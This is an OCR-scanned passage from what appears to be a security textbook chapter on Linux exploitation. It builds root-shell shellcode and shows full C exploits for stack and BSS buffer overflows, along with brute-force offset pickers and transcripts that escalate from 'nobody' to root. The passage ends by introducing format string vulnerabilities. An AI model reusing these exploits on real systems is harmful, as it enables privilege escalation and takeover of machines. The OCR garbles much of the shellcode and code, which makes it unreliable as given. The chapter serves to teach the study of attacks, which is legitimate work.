604645a: 62 69 6e bound tebp, Ox6e(tecx) 

S04845d: 2f das 

B04845e: 73 68 jae = 804848 <gcc?_compiled.+0x18> 
8048460: 00 Sd «3 add tbl, Oxttftittic3 (tebp) 





The instructions starting from address 8048459 are actually ASCII codes for the characters 
of the /bin/sh string in the hexadecimal notation: 

i & i nm sf 8 

2f 62 69 6e 2f 73 68 
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As you can see, the code has no zeros, so you can start testing it. However, simply launch- 
ing shellcode? from the command line will result in a core dump, because the program exe- 
cutes in the read-only text section while the shellcode is intended to be run in the stack. This 
limitation can be circumvented with the program shown in Listing 13.12. 


Listing 13.12. The program for testing the shellcode 





char shellcode[] = 

"\Meb\x1lE\xSe\xSB 9x7 ORO \KSL\xCON\XBS\H4I6\xO7T\ RES x46 \x0c\xbO\x0b" 
"\eBO\xf3\x8d\x4e\x08 \x8d\x56\x0c \xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\HBO\neS \xdc\xftf\xtt\xff/bin/sh"; 


int main() 

{ 
yoid(*shell) () = (void*)shellcode; 
shell (); 
return 0; 


Running this program (having compiled it first) will place a shell on the screen, telling you 
that there are no errors in the shellcode. 

# gcc shellcode3.c -o shellcode3 

* ./shellcodes 

sh-2.04% @x1t 

# 

In case the vulnerable program has the root SUID bit set, most known shellcodes include 
the setuid(0) and setgid(0) calls. These calls set root privileges: uid = O(root) and 
gid=0 (root). In the hexadecimal notation, these calls look as shown in Listings 13.13 and 13.14. 





Listing 13.13. The setuid call 





char setuid[] = 

"\x31\xc0" j* Hor] teax, eax wf 
"\xS1\xdb" i* xorl tebx, tebx * if 
"\ebO\x17" /* movb §0x17, tal ad J 
"\xcd\x80" /* int Sox80 td 


Listing 13.14. The setgid call 


char setgid[] = 

"\x31\xc0™ ;* xorl 46¢ax, %eax i 
"\xol\xdb" fs “orl tebx, tebx af 
"\xbO\x2e" fr movb 30x2e, tal ay 
MVxcd \x8o0" fs int S$0x80 A 


Adding these instructions at the beginning of the shellcode, you obtain a full-fledged 
shellcode that not only launches a shell but also sets the user and group identifiers to zero. 
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The final version of the shellcode is shown in Listing 13.15. Note that if the root suID bit is 
not set in the target program, the setuid(0) and setgqid(0) calls will fail, but this will not 
affect the further execution of the shellcode. 





Listing 13.15. The final shellcode 





char shéllcode[] = 
M\Wx3l\xcO\x31\xdb\xbO\xl7\xcd\x80" /* setuid(Q) */ 
"\eS1\xcO\RS1L\xdb\xbO\xze\xncd\x80" /* setgid(0) */ 
"\Wxeb\x1li\x5e\x89\x76\x08\x31\xc0" 

"\eSB\H46\e07 \XB9\x46\x0C \xbO\x0b" 

"Wxe9\xf3 \x8d\\x4de\x08 \x8d\x56\x0c" 

"Vcd \x8O\x3S 1 xd \x8 9 \ed8 \e40\xcd" 

"\xeO\xne8 \xdc\xfi\xff\xtt" 

"/bin/sh"; 





13.1.4. Constructing the Exploit 


Now you can start writing the actual exploit. Linux exploits have two main ways of passing 
a shellcode to a target application: 


O Using a vulnerable buffer 
© Using an environment variable 


I consider both of these methods and a third, nonstandard method that involves placing 
a shellcode in the heap. 


13.1.4.1. Passing a Shellcode Using a Vulnerable Buffer 


As already mentioned, the return address of the vulnerable function must be overwritten with 
the address of the shellcode. The most popular way is to pass the shellcode to the buffer of the 
vulnerable application and rewrite the return address to point to the beginning of this buffer. 
Listing 13.16 shows an exploit that implements this technique. The exploit builds the string 
shown in Fig. 13.2 to be passed to the vulnerable application. 


200 bytes 
NOP NOP NOP _ Shellcode _ RET RET RET 40 


Fig. 13.2. The string built by the exploit 


The RET addresses are successive return addresses to the shellcode, and the Nop instruc- 
tions are idle operation assembler instructions (code 0x90). The combination of these instruc- 
tions is called the NOP sled. The shellcode in this case is located approximately in the middle 
of the string. The string will be placed into the vulnerable buffer as shown in Fig. 13.3. 
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Shellcode 





Stack top (%esp) — 


Fig. 13.3. Placing the shellcode in the vulnerable buffer 


The buffer in the exploit must be larger than the buffer in the vulnerable application 
(200 bytes versus 100 bytes) to guarantee overwriting the return address; moreover, the shell- 
code must be located before or after the function return address but must not hit it. The Nop 
instructions are used so that you do not have to calculate the exact beginning of the shellcode, 
which is not an easy task. The return address only has to point to the approximate start of the 
buffer. In this case, if execution control hits the Nop sled, after the NOP instructions are exe- 
cuted, it will certainly pass to the shellcode. The return address can be calculated with the help 
of the esp register, which always points to the top of the stack — in other words, to the last 
item saved to the stack. The address of the stack top (the contents of the esp register) can be 
determined using the function whose source code is shown in Listing 13.16, 





Listing 13.16. The function to determine the top of the stack (%esp) 


unsigned long get_sp(void) 
| 

_asm__ ("movil tesp, teax"); 
} 





However, the address of the stack top can change, sometimes substantially, after 
the exec] ("./stack_vuln", "stack_vuln", buf, 0) function executes at the end of the ex- 
ploit; consequently, the contents of Sesp that you had determined may no longer point 
to the top of the stack. Thus, you can only calculate an approximate return address, for which 
the following instruction is placed at the beginning of the exploit: 


ret = esp - offset; 
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Here, offset is specified manually in the command line argument: 
offset = atoifargv[1]}; 


Given a certain amount of luck, this will allow you to hit the start of the shellcode with 
a great degree of certainty. Later, | show you how to automate the process of determining 
the return address. 

For now, check how the exploit works. For this, use the chmod ug+s stack valn command 
to set the SUID bit of the vulnerable stack vuln program and then use the su nobody com- 
mand to set the privileges to nobody: 


# gcc stack _vuln.c -o stack_vuln 

# gcc expl stackl.c -o expl_ stackl 

# chmod ugt+s stack vuln 

# ls -la stack vuln 

—-rwer-sr-x Ll reot root 13803 Apr 6 06:32 stack vuln 
# su nobody 

sh-2.04§ id 

uid=99(nebody) gid=99 (nobody) groups=99 (nobody) 
sh-2.045 ./ expl stackl 0 

The stack pointer (ESP) i185: Oxbfftt97s 

The offset from ESP is: Ox0 

The return address is: Oxbfffrftsys 

OR ! 

sh-2.044# id 

uid=0{(root) gid=O0(root) groups=99 (nobody) 
sh-2.044 


As you can see, I lucked out in a big way in that offset turned out to be 0; otherwise, 
I could have spent a long time trying to pick the necessary value. To determine the necessary 
overflow offset, a simple shell script or Perl program can be devised. Listing 13.17 shows 
the source code for such a program written in Perl. Quite often, such brute-force offset pickers 
are built directly into exploits. An exploit with a built-in brute-force offset picker is considered 
in Section 13,1.4.4. 





Listing 13.17. Passing a shellcode using a vulnerable buffer (expl_stack1.c) 





finclude <stdio.h> 

finclude <stdlib.h> 
finclude <string.h> 
finclude <unistd.h> 


char shelleode[] = 
WWasl\xcO\x31\xdb\xbO\x17\xcd\x80" 
"\xS31\xcO0\x31\xdb\xbO\xze\xcd\x80" 
" \eb\xLi\xSe\x89\x76\x08 \x3l\xcO" 
"\xX88\x4d6\x07\H89\x46\x0c\xb0\x0b" 
"\eMBO\xf3\edd\ede\ x08 \x8d\x564\x0c" 
"\xod \xBO\x31\xdb\x89\xd8\x40\xcd" 
"WHO \eed \edc\ ett \ ett \xtt" 
"/bin/sh"; 


/* Functions to determine the top of the stack */ 
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unsigned long get sp(void) 
{ 
__asm__("movl tesp, teax"); 


} 


int main(int argc, char *argv[]) 
{ 

int i, offset; 

long esp, ret, *addr ptr; 

char *ptr, buf[200]; 


if (arqe < 2) [{ 
fprintf(stderr, "Usage: $5 <offset>\n", argv([0]); 
exit(-1); 

I 


/* Obtaining the offset from the command line argument */ 
offset = atoilargv[1]); 


/* Determining the stack top */ 
esp = get sp(); 


/* Calculating the return address */ 
ret = esp - offset; 


printf ("The stack pointer (ESP) is: Ox¢x\n", esp); 
printf("The offset from ESP is: Oxtx\n", offset); 
printf("The return address is: Ox$x\n", ret); 


ptr = but; 
addr ptr = (long *)ptr; 


/* Filling the buffer with the return address */ 
for(i = O; i < 200; i += 4) 
(*(addr ptr++) = ret; } 


/* Filling the first 50 bytes of the buffer with NOP instructions 
(NOP sled) */ 
for(i = OF; 1 < 50; 14+) 
{buf({i) = "\x90';} 


ptr = buf + 50; 
/* Placing the shellcode after the NOP instructions */ 
for(i = O; i < strlen(shellcode); i++) 


{*{ptr++) = shellicode[il;} 


/* Placing a zero into the last buffer cell */ 
buf(200 - 1) = "\O0'; 


/* Running the program with the prepared buffer as an argument */ 
execl("./stack vuln", "stack vuln", but, 0); 


return 0; 
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Listing 13.18. The offset picker (bruteret.pl) 





#! fusr/bin/perl 

for($i = 1; $1 < 1500; $i++) 
print "Attempt $i \n"; 
system("./expl stackl $1"); 

} 


13.1.4.2. Passing a Shellcode Using an Environment Variable 


Listing 13.19 shows an exploit that also opens a system shell with root privileges but whose 
operation principle is different. In Linux, starting with address 0xc0000000 downward, the 
following data are stored: 

MO oxc0000000 — The first 5 bytes are zeros 

O Oxbfffffes — The name of the executed file 

O envy— Environment variables 


The exploit stores the shellcode as an environment variable and defines its address accord- 
ing to the following formula: 

ret = OxcO000000 - 6 - file name length - shellcode length 

This will be the required return address. The exploit simply fills the buffer with garbage 
data and places the calculated shellcode address where the return address of the function is 
supposed to be. It is not by accident that this address is stored in the 124th, 125th, 126th, and 
127th bytes of the buffer, as overwriting of the return address starts from the 124th byte: 


# ./hole ‘perl -e ‘print “A™x100"" 


OF ! 
# ./hole “perl -e ‘print "A"x1z3'" 
OF! 
# ./hole “perl -e ‘print "A"x124'° 
OK ! 


Segmentation fault (core dumped) 


As you can see, entering 124 A characters crashes the program; consequently, the following 
4 bytes (124 through 127) are the function return address. Other details are described in the 
comments in the code (Listing 13.19). 





Listing 13.19. Passing a shellcode using an environment variable (expl_stack2.c) 


include <stdio.h> 

#include <string.h> 

#include <unistd.h>1 

char shellcode[] = 

"\asi\xcO" * xor] teax, eax ltd 
"\x31\xdb" f® xorl tebxu, ‘tebx */ 
"\xbO'.«17" f* movb SOx17, tal af 
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"\xcd\x80" {* int 50x80  F 

M\x3S1\xc0" i* yor] teax, teax ald 
Ms3l\xdb"™ i /* xorl tebx, tebx */ 
"\xbO\xze" #* movb SOxze, tal =f 


"Hed \xbo" i? int 20x80 = 
VoL HCO" /*™ xorl eax, eax xf 
m\x50" /* pushl eax a d 


"\x6er"//sh™ /* pushl $0x68732f2f */ 
"\x68""/bin" /* pushl SOxée69e22f */ 
"\HdS\xe3" di mov) ‘esp, %tebp wf 


"x50" /* pushl ‘teax ait i 
"53" /* pushl ‘tebx aid 
"\x89\xel" /* movl $esp, *ecx * 
we 99" /* cltd * 
"\xb0\x0b" /* movb $0xb, tal * f 
"\wcd\xe0"; /* int S0x80 af 
int main() 


/* Preparing a character buffer for the environmental variable that 
will hold the shellcode */ 

char *env[] = (shellcode, NULL}; 

/* Preparing a character buffer for the overflow */ 

char buf[127); 

int i, ret; *ptr; 


ptr = {int *) (buf); 


/* Calculating the address, at which the shellcode will be located after 
the execle function executes */ 
ret = OxcO000000 - 6 - strlen(shellcode) - strlen("./stack vuln"); 


/* Saving the address obtained into the 124th, 125th, 126th, and 127th 
bytes of the buffer */ 
for(i = 0; i < 127; i += 4) {*ptrt+ = ret; ) 


/* Loading the target program with the prepared overflowing buffer and 
shellcode in the environment variable */ 
execle("./stack vuln", "stack vuln", buf, NULL, env); 





13.1.4.3. Passing Shellcode Using the Heap 


Listing 13.20 shows the third version of the exploit, which places the shellcode in the heap and 
fills the overflowing buffer with return addresses to the shellcode. It is necessary to specify the 
offset in the command line (the offset value of 1,000 works for me), so it is better to use the 
brute-force technique from Listing 13.20, having previously changed the expl1_stack1 name 
to expll stack3. Because this exploit places not the shellcode itself but only return addresses 
to it into the target buffer, it is more convenient to use; you do not have to worry whether 
the shellcode will fit into the space before the return address. The idea for this exploit was 
authored by crazy_einstein. 
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Listing 13.20. Passing a shellcode using the heap (expl_stack3.c) 








#include <stdio.h> 

#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 


char shellcode[] = 

"WHS1\xcO\x3S1 \xdb\xbO\s17 \xcd\x80" 
"\HbO\x2e \xcd \x80\xeb\x15\x5b\x31" 
MV xcO\xBS \x43\x07\x89\x5b\x08\xe9" 
"Hd \x0c\x9d\x4b\x08 \x31\xd2\xbo" 
"\xOb \encd\\xd0 \xeb \xea\xtf \xti\xit" 
"/bin/sh"; 


unsigned long get _sp(void) 
{ 


} 


asm _("movl tesp, teax"); 


int main(int arge, char **argv) 
{ 

int 1, offset; 

long esp, ret; 

char buf[500]; 

char *eqg, *ptr; 

char *av[3), *ev[2]; 


if (arge < 2) { 
fprintf(stderr, "Usage: ts <offset>\n", argyv[0)); 
exit(-1); 

} 

/* Obtaining the offset from the command line argument */ 

offset = atoi(argv[1]}; 

/* Determining the stack top */ 

esp = get _sp(); 

/* Calculating the return address */ 

ret = esp + offset; 


printf("The stack pointer (ESP) is: Oxtx\n", esp); 
printf ("The offset from ESP is: Oxtx\n", offset); 
printf("The return address is: Oxtx\n", ret); 


/* Allocating a buffer in the heap */ 

egg = (char *)malloc (1000); 

/* Placing the "EGG=" string at the start of the buffer */ 
sprintf(egg, "EGG="); 

/* Placing NOP instructions */ 

memset(egg + 4, 0x90, 1000 - 1 - strlen(shellcode) ); 

/* Placing the shellcode */ 

sprintf (egg + 1000 - 1 - strilen(shellcode), "%s", shellcode); 


ptr = buf; 
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/* Clearing the buffer in the stack */ 
bzero(buf, sizeof (buf)); 


* Filling the entire buffer with return addresses */ 
for [ 1 | OQ: 7 | 500: 1 += 4} 
{ ' ( long 7 | (ptr + i = ret: } 


/* Running the vulnerable program with the prepared overflowing buffer 
as the argument and passing the shellcode in the heap as an 
environment variable */ 


av(0] = "./stack vuln"; 
avil] = buf; 

av(2] = 0; 

ev(0] = egg; 

ev{l] = 0; 


execve (*av, av, GV); 


return 0; 





13.1.4.4. Exploit with a Built-in Brute-Force Offset Picker 


In most situations, the easiest way to determine the offset for exploits is to use a separate 
brute-force offset picker, like the one shown in Listing 13.18. But this will not work on sys- 
tems without Perl available or those that will not allow shell script execution. In this case, an 
offset picker is built right into the exploit. Listing 13.21 shows an example of such an exploit. 
Basically, this is the exploit from Listing 13.20 with an offset picker added to it. The algorithm 
of this offset picker is quite simple: At each loop iteration, a child thread is spawned, in which 
the vulnerable program with the overflowing buffer passed to it is executed, and the parent 
process awaits the results. The standard WIFEXITED() macro analyzes the result code to deter- 
mine whether the child thread terminated abnormally as a result of receiving a signal or nor- 
mally (using the exit () function or the return operator of the main() function). In the latter 
case, the loop terminates with the assumption that the shellcode executed successfully and a 
shell with root privileges was opened. This is not, however, always the case; therefore, the loop 
may have to be run again using another step. Sometimes, the child thread does not return any 
value and the loop hangs; in this case, it is terminated using the <Ctrl>+<C> key combination 
and started over with another step value. 

The offset step is passed to the exploit in the command line. The loop executes until offset 
becomes greater than 3,000 or whatever limit you set in the code. The remaining aspects of the 
exploit’s operation ought to be clear from the comments in the code. 





Listing 13.21. Exploit with a built-in brute-force offset picker (expl_brute.c) 





Hinclude <stdio.h> 

fFinclude <stdlib.h> 
tinclude <string.h> 
einclude <unistd.h> 
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#include <sys/types.h> 
#include <sys/wait.h> 


char shellcaode[] = 
"\H31\xcO\x31\xdb\xbO\x17\xcd\x80" 
"\ebO\x2e\xcd\\x80\xeb\x15\x5b\x31" 
"\xcO'\x88\x43\x07 \x89\x5b\x08\x89" 
"\x43\e0c\x8d\x4b\x08\x31\xd2\xbo" 
"\n0b\xcd\x80\xes \WHeb\ efi \eftf\xtt" 
"/pin/sh"; 


unsigned long get_sp(void) 


{ 


} 


asm  ("movl tesp, %eax"); 


int main(int argc, char *argv[)) 


{ 


char buf [500]; 

char *egg, *ptr; 

char *av[3], *ev[2]; 
pid _t pid; 

int i, step, offset = 0; 
long esp, ret? 

int status; 


if (arge < 2) { 
fprintf(stderr, "Usage: %3 <step>\n", aragv[0]); 
exit{-1); 

} 


step = atoifargyv[1)); 
esp = get_sp(); 
ret = esp; 


egg = (char *)malloc(1000); 

sprintfiegg, "EGG="); 

memset(egg + 4, 0x90, 1000 - 1 - strlen(shellcode)); 
sprintf(eqq + 1000 - 1 - strlen(shellcode), "ts", shellcode); 


ptr = buf; 
bzero(buf, sizeof(buf)); 


/* Looping until the offset becomes greater than 3,000 */ 
while (offset <= 3000) 
{ 

/* Spawning a child thread */ 

if {(pid = fork({)) == 0) 

{ 


/* Filling the entire buffer with the new return addresses */ 


for(i = 0; i <= 500; 1 += 4) 
i*{long *) (ptr + i) = ret;} 
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av[(Q] = “./stack_ vuln"; 
av([l] = buf; 

av[2] = 0; 

ev(Q)] = ega; 

ev[1] = 0; 


execve (*av, av, ev); 
exit (status); 


/* Waiting for the child thread to finish */ 
Walt (&status); 


/* Checking the returned value. If the value returned by the WIFEXITED() macro is not QO, 
the child thread terminated normally; that is, the shellcode probably was executed 
successfully. If the returned value is 0, continue looping through possible offsets. */ 


if (WIFEXITED(status) != 0) { 
forintfi(stderr, "The end: t#x\n", ret); 
exit(-1); 

} else--{ 


ret += offset; 


offset += step; 
fprintf(stderr, "Trying offset td, addr: t#x\n", offset, ret); 


return 0; 





13.2. BSS Buffer Overflow 


Exploits based on the BSS buffer overflow are significantly different from those based on the 
stack buffer overflow. The main difterence is that no function return addresses are stored in BSS, 
so you cannot hope to overwrite them. But sometimes programs store in BSS pointers to func- 
tions; the effect of overwriting these pointers is not that different from overwriting function re- 
turn addresses in the stack. Consider an example of a vulnerable program (Listing 13.22). 


Listing 13.22. A vulnerable program (bss_vuln.c) 








finclude <stdio.h> 
#include <string.h> 


void show(char *); 
int main(int argc, char *argv[]) 
( 

static char buf[100); 


static void (*func_ptr) (char *arq); 


if (argc < 2) { 
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printf("Usage: ts <buffer data>\n", argy[0])}; 
exit(1); 
} 


func ptr = show; 
strncpy(buf, argv[1], strlen(argv[1])}); 
Func ptr (buf); 


return 0; 
} 


void show(char *arg) 
{ 

printf ("\nBuffer: [%s]\n\n", arg); 
} 





In the program, a static buffer and a static function pointer are declared. Because both 
variables are static and uninitialized, they are stored in the BSS segment. In this program, the 
strepy() function does not check the size of the receiving buffer. This makes it possible to 
pass a string of any length to this function, which will overwrite the pointer to the function, 
for example, as follows: 


# gcc bss vuln.c -o bss vuln 
# ./bss_ vuln ‘perl -e ‘print "A™x1l00"" 


Butter: 
[ARARABRAAAA BAAR RARANS 
AADADRAD AAA AAD AR] 





# ./bss vuln ‘perl -e "print "A"x101'° 

Illegal instruction (core dumped) 

As you can see, the program issues an error message only after the 101st byte is overwrit- 
ten, which means that the function pointer is located right after the buffer, that is, in the 101st, 
102nd, 103rd, and 104th bytes. 

The important point is that in the vulnerable program, a static buffer is declared before 
a static function pointer; otherwise, you will not be able to overwrite the pointer. 

Accordingly, the exploit must overflow the buffer and overwrite the function pointer with 
the shellcode. You could place the shellcode in the vulnerable buffer and then pass control 
to it as in the classic stack buffer overflow. However, now you cannot use the ESP register, 
because it points to the stack top, whereas we are dealing with the BSS segment; therefore, 
determining the return address in this case will be more difficult. Moreover, 100 bytes 
allocated to the buffer may not be enough to store the shellcode in them. Thus, the easiest 
solution is to place the shellcode in an environment variable and to calculate its address, 
which will become the return address. Listing 13.23 shows the source code for implementing 
this method. 
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Listing 13.23. The BSS buffer overflow exploit (expl_bss.c) 





#include <stdio.h> 
#include <string.h> 
#include <unistd.h> 


char shellcode[] = 

"W371 \eec0" i “orl $eaxn, %eax * if 
"\x3l\xdb" {* xorl %ebx, bebx aid 
"\xbO\x17" $$/* movb $0x17, tal * f 
"\xcd\xe80" /* int $0x80 «/ 
"\x33\xc0" i* xorl $eax, eax + 
"\x31\xdb" /* xorl 6ebx, tebx xf 
"\xbO\x2e" 1% movb: SOxze, tal ~/ 


"\xcad\x80" /* int 20x80 “if 
"\x31\xcO" f* nor] $eax, $e@ax if 
myxsO" i* pushl eax ~ if 


"\x68""//sh" /* pushl $0x68732f2f */ 
"\x6e""/bin" /* pushl $0x6e69622f */ 
"\xBS\xes" /* movl tesp, tebp */ 


"\x50" /* pushl eax * 
"x53" /* pushl tebx wi 
"\x89\xel" /* movil $esp, tecx */ 
"\x99" /* eltd */ 
"\xbO\x0b" /* movb S0xub, tal tt 
"\xod\x80"; /* int 50x80 * 


int main()} 
f 
char *env[] = {shellcode, NULL}; 
char buf[(104]; 
unsigned long ret; 
unsigned long *ptr; 
int i; 
ptr = (unsigned long*) (buf); 
ret = OxcO000000 - strlen(shellcode) - strlen("./bss vuln") - 6; 
for(i = 0; i < 104; i += 4) {*ptr++ = ret;} 


execle("./bss vuln", “bss vuln", buf, NULL, env); 








Here is how to check the exploit’s operation: 

# gcc bss _vuln.c -o bss_vuln 

# gcc expl bss.c -o expl_bss 

# chmod ug+s ./bss vuln 

# ls -la ./bss_vuln 

~rwsr-sr-x 1 root root 14170 Apr 10 01:59 ./bss vuln 
# su nobody 

sh-2.045 id 

uid=99S (nobody) gid=99 (nobody) groups=99 (nobody) 
sh-2.045 ./expl_ bss 

sh-2.04% id 

uid=0 (root) gid=O(root}) groups=99 (nobady) 
sh-2.04# 
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The source codes for the vulnerable program and the exploit can be found in the /PART 
I[I/Chapter 13/13.2 directory on the accompanying CD-ROM. 


13.3. Format String Vulnerability 


The format string exploit was presented to the public for the first time on June 22, 2000, when 
someone nicknamed tf8 published its source code in Bugtraq. The exploit takes advantage 
of a format string error in the wu-ftpd 2.6.0 FTP daemon to execute a shellcode to open 
a command shell with root privileges. Information about the vulnerability and the exploit it- 
self can be found at the SecurityFocus site (http://www.securityfocus.com/bid/1387). 

In the body of the exploit, there is this comment: VERY PRIVATE VERSION. DO NOT 
DISTRIBUTE. 15-10-1999. 

As you can see, the exploit was created in October 1999, meaning that hackers were us- 
ing this exploit for almost nine months before the general public became aware of it. Only 
when different descriptions of this vulnerability started to appear did software developers 
and security specialists start paying attention to it, and the number of new exploits based on 
the format string error grew exponentially. Here is a list of just a few of the programs with 
the format string error, for which exploits have been written: lpr, ftpd, proftpd, telnetd, 
Linux rpce.statd, PHP versions 3 and 4, ypbind, different versions of the libc library, BSD 
chpass, and so on. 


13.3.1. Format String Fundamentals 


A format string is used in functions that change the format of input or output information. 
The following is a list of some of these functions: 


printf(const char *format, ...); 

forintf (FILE *stream, const char *format, ...); 
Sprintf(char *str, const char *format, ...); 

snprinti (char *str, size_t size, const char *format, ...}3 


vprintf (const char *format, va_list ap); 
viprintf (FILE *stream, const char *format, va_list ap); 


scanf (const char *format, ...)? 
fscanf (FILE *stream, const char *format, ...)3 
syslog({int priority, char *format, ...); 


As you can see, there are quite a few functions that convert format; most of these func- 
tions pertain to the American National Standard Institute (ANSI) C standard. Detailed infor- 
mation about each function can be learned in the corresponding man. 

Perhaps the most popular of the just listed functions is printf (), which outputs format- 
ted information. Here is an example of this function: 

printf ("string = $s, int = td\n", str, 1): 


In the preceding expression, "string = %s, int = %d\n" is the format string and str 
and i are the function’s parameters. 
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A format string can contain three types of objects: 


O Regular characters, which are copied into the output stream 

O Control sequences, also called escape sequences (see Table 13.1) 

O Format specifier characters, which always start with the % character and transform and out- 
put arguments in the specified order (see Table 13,2) 


Table 13.1. Control sequences 


a 
a 
a 
a 
a 


Double quote 


Backslash —— 





Octal number 


Hexadecimal number 


7 int A signed decimal integer 
An unsigned octal integer 


string characters are output until 
the first occurrence of the \\0 
sequence 





continues 
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Table 13.2 Continued 


Specifier | Argument type Input or output data 


A signed floating-point number 
ofthe [-] mmm. dddddd format, 
where cd is specified by the preci- 
sion (by default, the precision is 
six places) 





double Loat * A signed floating-point number 
of the [-—]nmmm.dddddd or 
[-]m.ddddddE [+|-]xx format, 
where dis specified 
by the precision (by default, 
the precision is six places) 


A signed floating-point number as 
in the case of Se, %E, or &f, but 
depending on the specified value 
and precision, the trailing zeros 
and decimal point are only printed 
when necessary 


The number of characters 
that have been printed out so far: 
stored in the argument 


No arguments are converted, 
simply the % character is output 





Note that unlike the rest of format specifiers, the $s, $p, and $n specifiers accept pointers 
to values and not values themselves. The most important character in designing format string- 
based exploits is the tn format specifier, whose unique capabilities are discussed later. 

Some non-ANSI C standard functions can have nonstandard format specifiers. For exam- 
ple, the syslog() function, in addition to the specifiers listed in Table 13.2, adds the 4m non- 
standard specifier, which in the function is replaced with an error message corresponding to 
the current value of the errno variable. 

Additional information characters may be placed between the ¢ character and the format 
specifier in the order they are listed here: 


O The ns qualifier (N is an integer greater than 0) specifies the position of the variable to be 
used in the list of arguments. This is a special qualifier, which is heavily used in format 
string exploits; its capabilities are considered later. 

O) Specifier modifying flags (in any order): 

e The - flag indicates that the converted argument must be justified to the left side of 
the field. 
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e The + flag indicates that numbers should always be output with the plus or minus 
sign. If this flag is not specified, positive numbers are output without the plus sign. 

e The space flag means that if the first character of the conversion specification is not 
a plus or minus sign or if the result of a signed conversion has no sign, the result starts 
with a space. Otherwise, the flag is ignored. 

e The 0 flag indicates that the output numbers must be padded with leading zeros to fill 
the entire field width. 


O The # qualifier specifies one of the following output formats:The first digit of an $0 result 
must always be 0. 
« A nonzero %x or $x result must always be preceded with 0x or 0x. 
e An $e, $£, $f, g, and %G result must always be output with a decimal point. 
¢ Trailing zeros must be retained in g and $6 results. 


[| A number specifying the minimal width of the field means that the corresponding argu- 
ment will be output in a field no shorter than the specified width and longer if necessary. 
If the number of characters in the converted argument is fewer than the available field 
spaces, the extra field spaces are padded on the left if the number is right-justified or on 
the right if the number is left-justified. Usually spaces (or zeros, in case of the zero- 
padding flag) are used as the padding characters. The parameter can be specified directly 
with a decimal number or indirectly with an asterisk. In the latter case, the necessary 
number is extracted from the following argument, which must be of the int type. Two as- 
terisks specify two arguments. A negative field width cannot be specified. If an attempt to 
specify a negative field width is made, it is interpreted as the minus flag followed by a posi- 
tive field width parameter. 

OM A decimal point followed by a number specifies the precision. The precision type depends 
on the specifier. For the s specifier, the number specifies the maximum number of the 
string characters to output. For the e, £, and f£ specifiers, the number specifies the number 
of digits output after the decimal point. For the g and G specifiers, the number specifies 
the number of significant digits. For the d, i, 0, u, x, and % specifiers, the number specifies 
the minimum number of digits to output for an integer. The number is padded with zeros 
to the necessary width at the left. The number after the point can be specified directly with 
a decimal number or indirectly with an asterisk. In the latter case, the necessary number is 
extracted from the following argument, which must be of the int type. Two asterisks 
specify two arguments. 

O The h, 1, or L modifiers set the argument type. The h modifier indicates that the corre- 
sponding argument must be output as short or unsigned short. In the case of the n 
specifier, the h modifier sets a pointer to short. The 1 modifier indicates that the 
argument is of the long or unsigned long type. In the case of the n specifier, 
the 1 modifier sets a pointer to long. The L modifier indicates that the argument is 
of the long double type. 


The operation of formatting functions is demonstrated in Listing 13.24 on an example of 
the printf () function. 
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Listing 13.24. A formatting function (printfl.c) 





#include <stdio.h> 


int main () 


{ 
char *str = "sklyaroff"; 
int num = 31337; 


printf("str = $s, adrr str = tp, num = $d, addr num = t#x\n", str, &str, num, &num); 


return WU; 


Run the program, and you will obtain the following results: 

' gcc printfl.c -o printfl 

str = sklyaroff, adrr_str = Oxbffffa04, num = 31337, addr num = Oxbffffaoo 

First, the printf () function pushes the arguments onto the stack. The arguments are 
pushed onto the stack in reverse order, as is the case with all standard C functions. In the ex- 
ample, first the addr num address is pushed onto the stack, then the num value, then the str 
string address, then the str pointer, and finally the address of the format line (see Fig. 13.4). 


Stack bottom 


The num = Oxbffffa00 address | 


The num = 31337 value 


The str string's address (the value of the str pointer) = Oxbffffa04 | 


The str = Oxbffffald pointer 


The address of the format string 





Fig. 13.4. The stack frame formed by the print() function 


Then the printf () function parses the format string character by character. If the next 
character is not a percent sign or a backslash, it is simply copied to the output stream. A back- 
slash means a start of a control sequence (see Table 13.1); therefore, the function carries 
out the actions corresponding to the given control sequence. A percent sign means a begin- 
ning of a format specifier (see Table 13.2). In this case, the format function pops the argument 
off the stack, transforms it as instructed by the format specifier, and then outputs the result. 

Understanding of the format function operation is necessary for developing format 
string exploits. 
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13.3.2. Format String Vulnerability Example 


The reason for the format string vulnerability is simple carelessness or laziness of program- 
mers when working with it. All it takes to create a vulnerability is to omit a necessary format 
specifier in a format string. Consider the example shown in Listing 13.25. 





Listing 13.25. A vulnerable ‘program ida c) 





Finclude <stdio.h> 


int main(int argc, char *argv[]) 
int a = 3; 
char *str = "ivan"; 
int b = 555; 


printf£targv[1]); 


return O: 





Compile, execute, and view the results: 

# gcc printf2.c -o printfz 

# ./printf2? test 

LESse 

In the example, the printf() function does not use any format specifiers but simply re- 
ceives an argument from the command line and outputs it to the screen. 

At a glance, the program works perfectly. But see what happens when it is passed a string 

containing format camels as in the following example: 

# ./printfi2 txtxtxtxtx 

40 0049b0400564: 20401509e4 40016b64bffffa9c 

What are those numbers that the function outputs? Here, the printf () function considers 
the string passed to it as a format string and parses it as was described in the previous section. 
When the printf () function is passed a string composed of regular characters, it simply out- 
puts them to the screen; however, when it encounters a format specification character, 
it pops an argument off the stack to transform it according to what it thinks is a format speci- 
fier. But because no arguments are specified, the function takes off the stack, starting from the 
top, the values that do not belong to it. This peculiarity in the function’s execution mecha- 
nism makes it possible to examine the entire stack. For example, find the values 3 and 555 in 
the stack, which must be stored on the stack before the printf () function is called. This can 
be done using the $d format specifier to produce a decimal number; enclosing a series of such 
specifiers in quotes allows them to be separated with spaces: 

# ./printf2 "td td td $d td td td td Sd td" 


LOTS7S7552 1074095136 1075120612 1LOT3834852 -1OVS7 20 -1L073743320 555 134513928 3 
—1O73743272 
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Note that the order and location of values in the stack may be different on different ma- 
chines because they are largely dependent on the version of GCC and the libraries, such as libe. 

A pointer to the string ivan must also be stored on the stack. It can be easily found ex- 
perimentally by sequentially using the %s specifier in different places: 

# ./printfi2 "sx tx x $x tx tx $x 3a" 

4000d9bO 40056420 401509e4 40016b64 bffffaTe bffffal8 22b ivan 

In this way, the stack can be easily examined from top to bottom. But what if you want to 
view, for example, the hundredth or thousandth value in the stack? Entering 100 or 1,000 
format specifiers in the command line would be rather tedious, to say the least. In this case, 
the necessary command can be entered as follows: 

i ./printf2 “perl -e "print "$x,"x50'° 

4900009b0, 40056420, 401509e4, 40016b64, bf fifalc, bi iff9as, 22b, 8046508, 3, bff ff9d6, 

